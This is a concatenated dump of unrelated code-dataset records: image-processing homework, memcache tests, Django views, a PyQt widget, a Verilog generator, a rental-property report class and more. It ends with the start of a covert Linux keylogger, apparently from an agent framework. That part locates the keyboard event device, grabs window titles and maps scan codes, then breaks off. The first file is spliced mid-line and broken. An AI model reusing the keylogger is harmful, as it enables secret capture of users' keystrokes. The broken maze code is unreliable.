(NMEICT)\n*\n*****************************************************************************************\n'''\n\n# Team ID: [ NB_887 ]\n# Author List: [ Tanaya Gupte, Kallol Saha ]\n# Filename: task_1b.py\n# Functions: applyPerspectiveTransform, detectMaze, writeToCsv\n# [ Comma separated list of functions in this file ]\n# Global variables:\n# [ List of global variables defined in this file ]\n\n\n####################### IMPORT MODULES #######################\n## You are not allowed to make any changes in this section. ##\n## You have to implement this task with the three available ##\n## modules for this task (numpy, opencv, csv) ##\n##############################################################\nimport numpy as np\nimport cv2\nimport csv\n##############################################################\n\n\n################# ADD UTILITY FUNCTIONS HERE #################\n## You can define any utility functions for your code. ##\n## Please add proper comments to ensure that your code is ##\n## readable and easy to understand. ##\n##############################################################\n\n\n\n\n\n\n##############################################################\n\n\ndef applyPerspectiveTransform(input_img):\n\n \"\"\"\n Purpose:\n ---\n takes a maze test case image as input and applies a Perspective Transfrom on it to isolate the maze\n\n Input Arguments:\n ---\n `input_img` : [ numpy array ]\n maze image in the form of a numpy array\n\n Returns:\n ---\n `warped_img` : [ numpy array ]\n resultant warped maze image after applying Perspective Transform\n\n Example call:\n ---\n warped_img = applyPerspectiveTransform(input_img)\n \"\"\"\n\n warped_img = None\n\n ############## ADD YOUR CODE HERE ##############\n #Converting image to grayscale\n gray = cv2.cvtColor(input_img, cv2.COLOR_BGR2GRAY)\n #Obtaining height and width of the image\n height, width = input_img.shape[:2]\n if (height, width)== (512,512):\n edged = cv2.Canny(gray, 30, 200)\n else:\n edged=cv2.threshold(gray, 245, 255, type=cv2.THRESH_BINARY)\n edged= edged[1]\n cv2.waitKey(0)\n\n #Finding conours of the image:\n contours = cv2.findContours(edged, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[0]\n\n #If contours contains more than 1 array, concatenating these into a single array\n if len(contours) is 2:\n s1= len(contours[0])\n s2= len(contours[1])\n C= [[[0,0]] for i in range((s1+s2)) ]\n C= np.array(C)\n C= C.reshape((s1+s2), 2)\n cnt= contours[0]\n C= np.concatenate((contours[0], contours[1]))\n elif len(contours) is 3:\n s1= len(contours[0])\n s2= len(contours[1])\n s3= len(contours[2])\n C= [[[0,0]] for i in range((s1+s2+s3)) ]\n C= np.array(C)\n C= C.reshape((s1+s2+s3), 2)\n cnt= contours[0]\n C= np.concatenate((contours[0], contours[1], contours[2]))\n else:\n C= contours[0]\n\n\n epsilon = 0.05*cv2.arcLength(C,True)\n #Applying approxPolyDP() function to get desired contours\n approx = cv2.approxPolyDP(C,epsilon,True)\n a00=0\n a01=0\n a10=0\n a11=0\n a20=0\n a21=0\n a30=0\n a31=0\n\n #For givan maze images:\n if (height, width)== (512,512):\n #Obtaining the 4 points to be used for perspective transform\n for i in range(len(approx)):\n #Eliminating points out of range\n if any(approx[i][0]>505):\n continue\n #Obtaining the lefmost top corner point\n if approx[i][0][0]<100:\n if approx[i][0][1]<100:\n a00= approx[i][0][0]\n a01= approx[i][0][1]\n #Obtaining the rightmost top corner point\n if approx[i][0][0]>400:\n if approx[i][0][1]<100:\n a10= approx[i][0][0]\n a11= approx[i][0][1]\n #Obtaining the rightmost bottom corner point\n if approx[i][0][0]>400:\n if approx[i][0][1]>400:\n a20= approx[i][0][0]\n a21= approx[i][0][1]\n #Obtaining the lefmost bottom corner point\n if approx[i][0][0]<100:\n if approx[i][0][1]>400:\n a30= approx[i][0][0]\n a31= approx[i][0][1]\n #For images obtained from coppelia sim vision sensor:\n else:\n for i in range(len(approx)):\n if approx[i][0][0]<50:\n if approx[i][0][1]<50:\n a00= approx[i][0][0]\n a01= approx[i][0][1]\n if 800 \"y\" or \"n\": ')\n\n if choice == 'y':\n\n for file_num in range(1, 10):\n\n # path to image file\n img_file_path = img_dir_path + 'maze0' + str(file_num) + '.jpg'\n\n print('\\n============================================')\n print('\\nFor maze0' + str(file_num) + '.jpg')\n\n # path for csv output file\n csv_file_path = img_dir_path + 'maze0' + str(file_num) + '.csv'\n\n # read the image file\n input_img = cv2.imread(img_file_path)\n\n # get the resultant warped maze image after applying Perspective Transform\n warped_img = applyPerspectiveTransform(input_img)\n\n if type(warped_img) is np.ndarray:\n\n # get the encoded maze in the form of a 2D array\n maze_array = detectMaze(warped_img)\n\n if (type(maze_array) is list) and (len(maze_array) == 10):\n\n print('\\nEncoded Maze Array = %s' % (maze_array))\n print('\\n============================================')\n\n # writes the encoded maze array to the csv file\n writeToCsv(csv_file_path, maze_array)\n\n cv2.imshow('warped_img_0' + str(file_num), warped_img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n else:\n\n print('\\n[ERROR] maze_array returned by detectMaze function is not complete. Check the function in code.\\n')\n exit()\n\n else:\n\n print('\\n[ERROR] applyPerspectiveTransform function is not returning the warped maze image in expected format! Check the function in code.\\n')\n exit()\n\n else:\n\n print('')\n","sub_path":"task_4a_path_planning_windows/task_1b.py","file_name":"task_1b.py","file_ext":"py","file_size_in_byte":15171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"568771686","text":"import asyncio\nimport pytest\nfrom aiomcache.pool import MemcachePool, _connection\n\n\ndef test_pool_creation(mcache_params, loop):\n pool = MemcachePool(minsize=1, maxsize=5, loop=loop, **mcache_params)\n assert pool.size() == 0\n assert pool._minsize == 1\n\n\n@pytest.mark.run_loop\ndef test_pool_acquire_release(mcache_params, loop):\n pool = MemcachePool(minsize=1, maxsize=5, loop=loop, **mcache_params)\n conn = yield from pool.acquire()\n assert isinstance(conn.reader, asyncio.StreamReader)\n assert isinstance(conn.writer, asyncio.StreamWriter)\n pool.release(conn)\n\n\n@pytest.mark.run_loop\ndef test_pool_acquire_release2(mcache_params, loop):\n pool = MemcachePool(minsize=1, maxsize=5, loop=loop, **mcache_params)\n reader, writer = yield from asyncio.open_connection(\n mcache_params['host'], mcache_params['port'], loop=loop)\n # put dead connection to the pool\n writer.close()\n reader.feed_eof()\n conn = _connection(reader, writer)\n yield from pool._pool.put(conn)\n conn = yield from pool.acquire()\n assert isinstance(conn.reader, asyncio.StreamReader)\n assert isinstance(conn.writer, asyncio.StreamWriter)\n\n\n@pytest.mark.run_loop\ndef test_pool_clear(mcache_params, loop):\n pool = MemcachePool(minsize=1, maxsize=5, loop=loop, **mcache_params)\n conn = yield from pool.acquire()\n pool.release(conn)\n assert pool.size() == 1\n yield from pool.clear()\n assert pool._pool.qsize() == 0\n\n\n@pytest.mark.run_loop\ndef test_pool_is_full(mcache_params, loop):\n pool = MemcachePool(minsize=1, maxsize=2, loop=loop, **mcache_params)\n conn = yield from pool.acquire()\n\n # put garbage to the pool make it look like full\n mocked_conns = [_connection(0, 0), _connection(1, 1)]\n yield from pool._pool.put(mocked_conns[0])\n yield from pool._pool.put(mocked_conns[1])\n\n # try to return connection back\n assert pool.size() == 3\n pool.release(conn)\n assert pool.size() == 2\n\n\n@pytest.mark.run_loop\ndef test_acquire_dont_create_new_connection_if_have_conn_in_pool(mcache_params,\n loop):\n pool = MemcachePool(minsize=1, maxsize=5, loop=loop, **mcache_params)\n assert pool.size() == 0\n\n # Add a valid connection\n _conn = yield from pool._create_new_conn()\n yield from pool._pool.put(_conn)\n assert pool.size() == 1\n\n conn = yield from pool.acquire()\n assert conn is _conn\n assert pool.size() == 1\n","sub_path":"tests/pool_test.py","file_name":"pool_test.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"263222944","text":"# calculating final value of investment\ndef investment(initial, rate, time, number):\n print(initial*(1 + rate/number)**(time*number))\n\n\nc = input(\"enter initial amount: \")\nr = input(\"enter rate: \")\nt = input(\"enter time: \")\nn = input(\"enter number of times: \")\ntry:\n c = int(c)\n r = float(r)\n t = int(t)\n n = int(n)\nexcept:\n print(\"Enter numeric inputs\")\n exit()\ninvestment(c, r, t, n)\n","sub_path":"src/chapter4/exercise2.py","file_name":"exercise2.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"75494397","text":"from sys import argv\nfrom urllib2 import urlopen, Request\nfrom re import findall\n\nprint_non_digits = False\n\n\ndef red(string):\n return '\\033[91m'+string+'\\033[0m'\n\n\ndef digits(num):\n num = list(num[::-1])\n at_end = True\n contains_digits = False\n for i, char in enumerate(num):\n if i+1 < len(num):\n if at_end:\n if char == num[i+1]:\n num[i] = red(num[i])\n num[i+1] = red(num[i])\n contains_digits = True\n else:\n at_end = False\n num = num[::-1]\n if print_non_digits or contains_digits:\n print(''.join(num))\n\n\ndef main(url):\n req = Request(url)\n req.add_header(\"User-Agent\", \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36\")\n resp = urlopen(req)\n data = resp.read()\n\n posts = findall(r'javascript:quote\\(\\'(.*?)\\'\\)', data)\n replies = posts[2:]\n new_replies = []\n\n for i in range(0, len(replies), 2):\n new_replies.append(replies[i])\n replies = new_replies\n\n for reply in replies:\n digits(reply)\n\nif __name__ == \"__main__\":\n url = argv[1] if len(argv) > 1 else raw_input(\">\")\n if len(argv) > 2:\n print_non_digits = True if argv[2] == \"non\" else False\n main(url)\n","sub_path":"digits.py","file_name":"digits.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"138101250","text":"from fpdf import FPDF\nimport os\n\n\nclass Reports:\n def __init__(self, house, fo):\n self.pdf = FPDF(unit='in', format='letter')\n self.report_title = os.path.join('homes', house.address, f'{house.address}.pdf')\n self.house = house\n self.fo = fo\n self.fo.down_unfinanced()\n\n def initialize_report(self):\n self.pdf.set_font('Arial', size=12)\n\n def ammoritization(self, test=False):\n situation = lambda x: 'test-' if x else ''\n name = f'{situation(test)}{self.house.address}'\n self.pdf.add_page()\n self.pdf.cell(8,.5, txt=f'Amoritization Schedule', ln=1, align='C')\n self.pdf.image(os.path.join('homes',name,'graphs', 'amoritization.png'), x=1, y=1.5, w=6)\n self.pdf.ln(6)\n amr = self.fo.ammoritization\n year5 = self.house.price*(1.05)**(5)-amr[60]\n year5 = round(year5,2)\n year10 = self.house.price*(1.05)**(10)-amr[120]\n year10 = round(year10,2)\n s1=f'On the assumption that the home value increases an average of 5% a year, the value of the home compared to the remaining balance on the loan will be {format(year5, \".2f\")}$.'\n s2=f'On the same assumption, the value compared to the remaining loan balance after 10 years will be {format(year10, \".2f\")}$. Industry trends will all but guarentee a net gain in value after'\n s3=f'a ten year period. If profitable, the investment exit plan will be to sell the home at the 5 year mark, but if future economic conditions are unfavorable to a sale at that time'\n s4=f'the exit strategy will wait up to the ten year mark to tell the property'\n self.pdf.multi_cell(8, .2, txt=f'{s1} {s2} {s3} {s4}', align='L')\n\n def monthly_breakdown(self, test=False):\n situation = lambda x: 'test-' if x else ''\n name = f'{situation(test)}{self.house.address}'\n self.pdf.add_page()\n self.pdf.cell(8,.5, txt=f'Monthly Expenses', ln=1, align='C')\n self.pdf.image(os.path.join('homes',name,'graphs', 'cost_dist.png'), x=1, y=1.5, w=6)\n self.pdf.ln(6)\n rent = self.house.rent\n rooms = self.house.rooms\n ccost = self.fo.closing_costs\n coc = self.fo.coc\n apr = self.fo.mo_rate\n loan = self.fo.loan_amount\n taxes = self.fo.home.tax\n mcost = self.fo.mortgage+self.fo.home_insurance/12+rent*self.fo.management_fee+self.fo.home.tax\n mcost = round(mcost, 2)\n\n s1 = f'The market rate rent for this {rooms} bedroom home is {format(rent, \".2f\")}$ a month. The total monthly costs are estimated to be {format(mcost, \".2f\")}$, and the total monthly cashflow is estimated to be {format(rent-mcost, \".2f\")}$'\n self.pdf.multi_cell(8, .2, txt=f'{s1}', align='L')\n\n def interest_rate_breakdown(self, test=False):\n situation = lambda x: 'test-' if x else ''\n name = f'{situation(test)}{self.house.address}'\n self.pdf.add_page()\n self.pdf.cell(8,.5, txt=f'Rate Analysis', ln=1, align='C')\n self.pdf.image(os.path.join('homes',name,'graphs', 'profit-rates.png'), x=1, y=1.5, w=6)\n self.pdf.ln(6)\n s1 = f'the house is profitable as shown above'\n self.pdf.multi_cell(8,.2,txt=s1, align='L')\n\n def summary(self, test=False):\n self.pdf.add_page()\n situation = lambda x: 'test-' if x else ''\n name = f'{situation(test)}{self.house.address}'\n self.pdf.ln(1)\n self.pdf.cell(8, 0.5, txt=f'Summary for {name}', ln=1, align='C')\n mcost = self.fo.mortgage+self.fo.home_insurance/12+self.house.rent*self.fo.management_fee+self.fo.home.tax\n s1 = f'{self.house.address} is a {self.house.rooms} bedroom single family home on sale for a purchase price of {format(self.house.price, \".2f\")}$. This report shows the cash flow opportunities when purchasing this property with a 20% down payment of {format(self.fo.down_payment, \".2f\")}$ and a {self.fo.mo_rate*100}% APR loan of {format(self.fo.loan_amount, \".2f\")}$. At a market rate rent of {format(self.house.rent, \".2f\")}$ and monthly costs of {format(mcost, \".2f\")}$, this property is expected to produce a monthly cashflow of {format(self.house.rent-mcost, \".2f\")}$ and produce an annual cash on cash return of {round(self.fo.coc*100, 2)}%.'\n self.pdf.multi_cell(8, .2, txt=s1, align='L')\n\n def save_report(self, test=False):\n situation = lambda x: 'test-' if x else ''\n name = f'{situation(test)}{self.house.address}'\n report_name = os.path.join('homes', name, f'{self.house.address}.pdf')\n self.pdf.output(report_name)\n\n\n def create_report(self, test):\n self.initialize_report()\n self.summary()\n self.monthly_breakdown(test)\n self.ammoritization(test)\n self.interest_rate_breakdown(test)\n self.save_report(test)\n\n","sub_path":"reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":4828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"308486553","text":"\nimport numpy as np\n\nfrom numpy.testing import assert_array_equal, assert_array_almost_equal, \\\n assert_almost_equal\nfrom nose.tools import assert_raises, assert_true, assert_equal, \\\n assert_not_equal\n\nfrom sklearn.datasets.samples_generator import make_classification\n\nfrom lightning.primal_newton import PrimalNewton\n\nbin_dense, bin_target = make_classification(n_samples=200, n_features=100,\n n_informative=5,\n n_classes=2, random_state=0)\n\ndef test_primal_newton():\n clf = PrimalNewton(kernel=\"rbf\", gamma=0.1, random_state=0, verbose=0)\n clf.fit(bin_dense, bin_target)\n assert_almost_equal(clf.score(bin_dense, bin_target), 1.0)\n\n\ndef test_primal_newton_incremental():\n clf = PrimalNewton(kernel=\"rbf\", gamma=0.1, random_state=0, verbose=0,\n n_components=70)\n clf.fit(bin_dense, bin_target)\n assert_almost_equal(clf.score(bin_dense, bin_target), 1.0)\n assert_equal(clf.n_support_vectors(), 70)\n","sub_path":"lightning/tests/test_primal_newton.py","file_name":"test_primal_newton.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"224868138","text":"# -*- coding: utf-8 -*-\n\n\n\"\"\"\nCreated on 13.10.2010\n\n@author: vda\n\"\"\"\n\n\nfrom PyQt4 import QtCore, QtGui\n\n\nclass NuclideDisplayWidget(QtGui.QWidget):\n def __init__(self, parent=None, bg=\"#EFEFEF\", fg=\"#000000\"):\n QtGui.QWidget.__init__(self, parent)\n self.setMinimumSize(QtCore.QSize(100, 100))\n self.setMaximumSize(QtCore.QSize(100, 100))\n self.setGeometry(0, 0, 100, 100)\n \n self.bg_color = bg\n self.fg_color = fg\n \n self.set_data()\n \n def set_data(self, nuclide=None):\n \"\"\"\n Redraws widget using specified values.\n \n @param nuclide: object with predefined properties, i.e:\n class MyNuclide(object):\n def __init__(self):\n self.lat = 'Pb' #shortened latin name, stands for Plumbum\n self.a_mass = '999' #atomic mass\n self.a_num = '82' #atomic number\n \n widget = NuclideDisplayWidget()\n widget.set_data(MyNuclide)\n \n OR simplier version:\n \n class MyNuclide: pass\n nuclide = MyNuclide()\n nuclide.lat, nuclide.a_mass, nuclide.a_num = 'Pb', '999', '82'\n widget = NuclideDisplayWidget()\n widget.set_data(nuclide)\n \"\"\"\n if nuclide:\n self.lat = nuclide.lat\n self.a_mass = nuclide.a_mass\n self.a_num = nuclide.a_num\n else:\n self.lat = None\n self.a_mass = None\n self.a_num = None\n self.update()\n \n def reset(self):\n self.lat = None\n self.a_mass = None\n self.a_num = None\n self.update()\n \n def paintEvent(self, event):\n lat = '?' if not self.lat else self.lat\n a_mass = '?' if not self.a_mass else self.a_mass\n a_num = '?' if not self.a_num else self.a_num\n \n painter = QtGui.QPainter()\n painter.begin(self)\n \n painter.setBrush(QtGui.QBrush(QtGui.QColor(self.bg_color)))\n painter.setPen(QtCore.Qt.NoPen)\n painter.drawRect(0, 0, 100, 100)\n \n #painter.setPen(QtCore.Qt.black)\n painter.setPen(QtGui.QPen(QtGui.QColor(self.fg_color)))\n \n big_font = QtGui.QFont('Helvetica', 25, QtGui.QFont.DemiBold)\n big_font.setStyleHint(QtGui.QFont.Helvetica)\n big_font.setStyleStrategy(QtGui.QFont.PreferAntialias)\n painter.setFont(big_font) \n painter.drawText(event.rect(), QtCore.Qt.AlignCenter, lat)\n \n small_font = QtGui.QFont('Helvetica', 12, QtGui.QFont.Light)\n small_font.setStyleHint(QtGui.QFont.Helvetica)\n small_font.setStyleStrategy(QtGui.QFont.PreferAntialias)\n painter.setFont(small_font)\n \n fm = QtGui.QFontMetricsF(small_font)\n \n point = QtCore.QPointF(6, fm.ascent() + 3)\n painter.drawText(point, str(a_mass))\n \n point = QtCore.QPointF(6, self.height() - fm.ascent() / 2)\n painter.drawText(point, str(a_num))\n \n painter.end()\n \n","sub_path":"ui/widgets/nuclidedisplaywidget.py","file_name":"nuclidedisplaywidget.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"631478006","text":"import numpy as np\nimport pandas as pd\n\n#function to read a CSV file and manipulate its columns\ndef read_file():\n #Reading the data into a datframe\n data = pd.read_csv('Assign_1_10.csv')\n data1 = data\n data['Mean'] = data.mean(axis = 1) #Calculating mean of each row\n #Converting Data to mean-zero data\n for i in range(100):\n name = 'Vector'+str(i+1)\n data1[name] = data1[name] - data['Mean']\n sum = 0\n #Calculating Inner product of each Vector and adding them up\n for i in range(100):\n name = 'Vector'+str(i+1)\n arr = np.array([])\n arr = data1[name]\n sum = sum + np.dot(arr.transpose(),arr)\n j = i+1\n\n result = sum/j\n\n return result\n\ndef main():\n result = read_file()\n print(\"\\nThe required sum is: \",result)\n\nif __name__ == '__main__':\n main()\n","sub_path":"Assignment1/204102310 Satya Prakash Singh/Q11.py","file_name":"Q11.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"538576688","text":"import heapq\n\n\nclass Solution:\n def smallestDistancePair(self, nums: List[int], k: int) -> int:\n\n nums = sorted(nums)\n heap = []\n heapq.heapify(heap)\n\n for index, element in enumerate(nums[:-1]):\n second = nums[index + 1]\n distance = abs(second - element)\n\n heapq.heappush(heap, (distance, index, index + 1))\n\n for _ in range(k):\n\n distance, index_1, index_2 = heapq.heappop(heap)\n\n if index_2 < len(nums) - 1:\n new_distance = abs(nums[index_2 + 1] - nums[index_1])\n heapq.heappush(heap, (new_distance, index_1, index_2 + 1))\n\n return distance\n","sub_path":"719_Find_K-th_Smallest_Pair_Distance.py","file_name":"719_Find_K-th_Smallest_Pair_Distance.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"38870526","text":"from pygears.typing import Int, Uint, is_type\nfrom pygears.typing.visitor import TypingVisitorBase\n\n\nclass VGenTypeVisitor(TypingVisitorBase):\n def __init__(self, name, direction, basic_type='wire', hier=True):\n self.context = name\n self.basic_type = basic_type\n self.hier = hier\n self.direction = direction\n\n def visit_Int(self, type_, field, **kwds):\n return [\n f'{self.basic_type} signed [{type_.width-1}:0] {self.context}; // {type_}'\n ]\n\n def visit_Bool(self, type_, field, **kwds):\n return [f'{self.basic_type} [0:0] {self.context}; // {type_}']\n\n def visit_Uint(self, type_, field, **kwds):\n if type_.width != 0:\n return [\n f'{self.basic_type} [{type_.width-1}:0] {self.context}; // {type_}'\n ]\n\n return None\n\n visit_Ufixp = visit_Uint\n visit_Fixp = visit_Int\n\n def visit_Unit(self, type_, field, **kwds):\n return None\n\n def visit_Union(self, type_, field, **kwds):\n res = []\n\n # top\n res.append(\n f'{self.basic_type} [{type_.width-1}:0] {self.context}; // {type_}')\n\n res.extend(\n self._complex_type_iterator([('data', type_.data),\n ('ctrl', type_.ctrl)]))\n\n return res\n\n def visit_Queue(self, type_, field, **kwds):\n res = []\n\n # top\n res.append(\n f'{self.basic_type} [{type_.width-1}:0] {self.context}; // {type_}')\n\n res.extend(\n self._complex_type_iterator([('data', type_.data),\n ('eot', type_.eot)]))\n return res\n\n def _complex_type_iterator(self, subt_enum):\n if not self.hier:\n return []\n\n res = []\n parent_context = self.context\n pos_low = 0\n for name, subt in subt_enum:\n self.context = f'{parent_context}_{name}'\n sub_wire = self.visit(subt, None)\n if sub_wire:\n res.extend(sub_wire)\n pos_high = pos_low + subt.width - 1\n if self.direction == 'input':\n res.append(\n f'assign {self.context} = {parent_context}[{pos_high}:{pos_low}];'\n )\n else:\n res.append(\n f'assign {parent_context}[{pos_high}:{pos_low}] = {self.context};'\n )\n\n pos_low = pos_high + 1\n\n self.context = parent_context\n return res\n\n def visit_Tuple(self, type_, field, **kwds):\n res = []\n res.append(\n f'{self.basic_type} [{type_.width-1}:0] {self.context}; // {type_}')\n\n res.extend(self._complex_type_iterator(zip(type_.fields, type_.args)))\n\n return res\n\n def visit_Array(self, type_, field, **kwds):\n if getattr(type_.data, 'signed', False):\n merge_t = Int[type_.data.width * len(type_)]\n else:\n merge_t = Uint[type_.data.width * len(type_)]\n\n arr_var = f'{self.context}_arr'\n res = self.visit(merge_t, type_.fields[0])\n res.append(\n f'{self.basic_type} [{type_.data.width-1}:0] {arr_var} [0:{len(type_).width-1}];')\n\n high = 0\n low = 0\n for i in range(len(type_)):\n high += type_.data.width\n\n if self.direction == 'input':\n res.append(f'assign {arr_var}[{i}] = {self.context}[{high - 1}:{low}];')\n else:\n res.append(f'assign {self.context}[{high - 1}:{low}] = {arr_var}[{i}];')\n\n low += type_.data.width\n\n return res\n\n\ndef vgen_intf(dtype, name, direction, hier=True):\n valid = f'reg {name}_valid;\\n'\n ready = f'reg {name}_ready;'\n\n if isinstance(dtype, str):\n data = f'{dtype} {name}_data;\\n'\n return data + valid + ready\n\n if dtype.width == 0:\n data = f'wire [0:0] {name}_data;\\n'\n return data + valid + ready\n\n vis = VGenTypeVisitor(name,\n direction=direction,\n basic_type='wire',\n hier=hier)\n data = '\\n'.join(vis.visit(type_=dtype, field=name)) + '\\n'\n return data + valid + ready\n\n\ndef vgen_signal(dtype, vtype, name, direction, hier=True):\n if isinstance(dtype, str):\n return f'{dtype} {name};'\n\n if is_type(dtype) and dtype.width == 0:\n return f'{vtype} [0:0] {name};'\n\n if not hier:\n if is_type(dtype):\n width = dtype.width\n sign = 'signed' if getattr(dtype, 'signed', False) else ''\n elif isinstance(dtype, (tuple, list)):\n width = sum(d.width for d in dtype)\n sign = ''\n\n return f'{vtype} {sign} [{width-1}:0] {name}; // {dtype}'\n\n vis = VGenTypeVisitor(name,\n basic_type=vtype,\n direction=direction,\n hier=hier)\n\n return '\\n'.join(vis.visit(type_=dtype, field=name))\n","sub_path":"pygears/hdl/sv/v/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":5008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"591352302","text":"from django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.shortcuts import (render, redirect, get_object_or_404)\nfrom django.template import loader\nfrom django.contrib.auth.decorators import login_required\nfrom Patient.models import Profile\nfrom Patient.forms import ProfileForm\nfrom Researcher.views import *\n\n# Create your views here.\n\nfrom django.http import HttpResponse\n\ndef index(request):\n\t# if (request.user.is_athenticated()):\n\t\t# return HttpResponse(\"logged in\")\n\treturn redirect(\"/login\")\n\n\n@login_required\ndef logout_user(request):\n\tlogout(request)\n\t# return HttpResponse(\"asdf\")\n\treturn redirect('../login')\n\n# def newAccount(request):\n\t# if (request.method == 'POST'):\n\ndef about(request):\n template = loader.get_template('./about.html')\n return HttpResponse(template.render({},request))\n\n\ndef researcher_login(request):\n\ttemplate = loader.get_template('./researcher_login.html')\n\terrorMsg=''\n\tform = AuthenticationForm()\n\n\tif request.method == 'POST':\n\t\tform = AuthenticationForm(data=request.POST)\n\t\tif form.is_valid():\n\t\t\tuser = User.objects.get(username = request.POST['username'])\n\t\t\tprofile = Profile.objects.get(user_id=user)\n\t\t\tif profile.isResearcher:\n\t\t\t\tuser = authenticate(username=request.POST['username'],password=request.POST['password'])\n\t\t\t\tif user is not None:\n\t\t\t\t\treturn redirect('/researcher_home')\n\t\t\t\telse:\n\t\t\t\t\terrorMsg = 'Error - please double check your password/username!'\n\t\t\telse:\n\t\t\t\terrorMsg=errorMsg+\"Sorry, you must be a researcher. \"\n\t\telse:\n\t\t\terrorMsg = errorMsg + 'validation error'\n\treturn HttpResponse(template.render({'errorMsg':errorMsg,'form':form},request))\n\ndef new_account(request):\n\terrorMsg = \"\"\n\tif request.method == 'POST':\n\t\t# username = request.POST['username']\n\t\t# password = request.POST['password']\n\t\tuForm = UserCreationForm(request.POST)\n\t\tpForm = ProfileForm(request.POST)\n\t\tif pForm.is_valid() and uForm.is_valid():\n\t\t\tuser = uForm.save() #User.objects.create_user(username=username,password=password)\n\t\t\t# user.save()\n\t\t\t# if (reques)\n\t\t\tprofile = Profile.objects.create(user=user,isResearcher=(request.POST['isResearcher']=='on'),healthcardNumber=pForm.cleaned_data['healthcardNumber'])\n\t\t\tprofile.save()\n\t\t\tresearcher_home(request)\n\t\t\t# return redirect('/login')\n\t\telse:\n\t\t\treturn HttpResponse(\"pForm not validated\")\n\t\t\terrorMsg = \"Form validation error\"\n\tuserForm = UserCreationForm()\n\tprofileForm = ProfileForm()\n\ttemplate = loader.get_template('./new_account.html')\n\tcontext = {'userForm':userForm,'profileForm':profileForm, 'errorMsg':errorMsg, 'errLen':(len(errorMsg))}\n\treturn HttpResponse(template.render(context,request))\n","sub_path":"CapacityDiagnostic/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"320917015","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\nfrom .views import HomePage, AboutPage\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^accounts/', include('registration.backends.hmac.urls')),\n url(r'^$', HomePage.as_view(), name='home'),\n url(r'^about/', AboutPage.as_view(), name='about'),\n url(r'^profile/', include('user_profile.urls')),\n url(r'^recipe/', include('recipe.urls')),\n url(r'^recipebook/', include('recipebook.urls')),\n url(r'^review/', include('review.urls')),\n url(r'^notifications/', include('notification.urls')),\n url(r'^list/', include('shoppinglist.urls')),\n]\n","sub_path":"recipes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"544365424","text":"def keylog_no_X(task_id):\n\n global responses \n\n\n def get_active_window_title():\n root = subprocess.Popen(['xprop', '-root', '_NET_ACTIVE_WINDOW'], stdout=subprocess.PIPE)\n stdout, stderr = root.communicate()\n\n m = re.search(b'^_NET_ACTIVE_WINDOW.* ([\\w]+)$', stdout)\n if m != None:\n window_id = m.group(1)\n window = subprocess.Popen(['xprop', '-id', window_id, 'WM_NAME'], stdout=subprocess.PIPE)\n stdout, stderr = window.communicate()\n else:\n return \"None\"\n\n match = re.match(b\"WM_NAME\\(\\w+\\) = (?P.+)$\", stdout)\n if match != None:\n return match.group(\"name\").strip(b'\"').decode()\n\n return \"None\"\n\n def find_event():\n\n f = open(\"/proc/bus/input/devices\")\n lines = str(f.readlines())\n\n while lines.find(\"I:\") != -1:\n #Read block by block\n event = \"\"\n start = lines.find(\"I:\")\n end = lines.find(\"B: EV=\")+12\n\n if lines[start:end].find(\"B: EV=12001\") != -1:\n event_start = lines[start:end].find(\"event\")\n event_start += start \n\n i = 1\n try:\n while True:\n int(lines[event_start + 5 : event_start + 5 + i])\n event = lines[event_start: event_start + 5 + i]\n i += 1\n except:\n return event\n\n lines = lines[end-6:]\n\n\n\n qwerty_map = {\n 2: \"1\", 3: \"2\", 4: \"3\", 5: \"4\", 6: \"5\", 7: \"6\", 8: \"7\", 9: \"8\", 10: \"9\",\n 11: \"0\", 12: \"-\", 13: \"=\", 14: \"[BACKSPACE]\", 15: \"[TAB]\", 16: \"a\", 17: \"z\",\n 18: \"e\", 19: \"r\", 20: \"t\", 21: \"y\", 22: \"u\", 23: \"i\", 24: \"o\", 25: \"p\", 26: \"^\",\n 27: \"$\", 28: \"\\n\", 29: \"[CTRL]\", 30: \"q\", 31: \"s\", 32: \"d\", 33: \"f\", 34: \"g\",\n 35: \"h\", 36: \"j\", 37: \"k\", 38: \"l\", 39: \"m\", 40: \"ù\", 41: \"*\", 42: \"[SHIFT]\",\n 43: \"<\", 44: \"w\", 45: \"x\", 46: \"c\", 47: \"v\", 48: \"b\", 49: \"n\", 50: \",\",\n 51: \";\", 52: \":\", 53: \"!\", 54: \"[SHIFT]\", 55: \"FN\", 56: \"ALT\", 57: \" \", 58: \"[CAPSLOCK]\",\n }\n\n\n 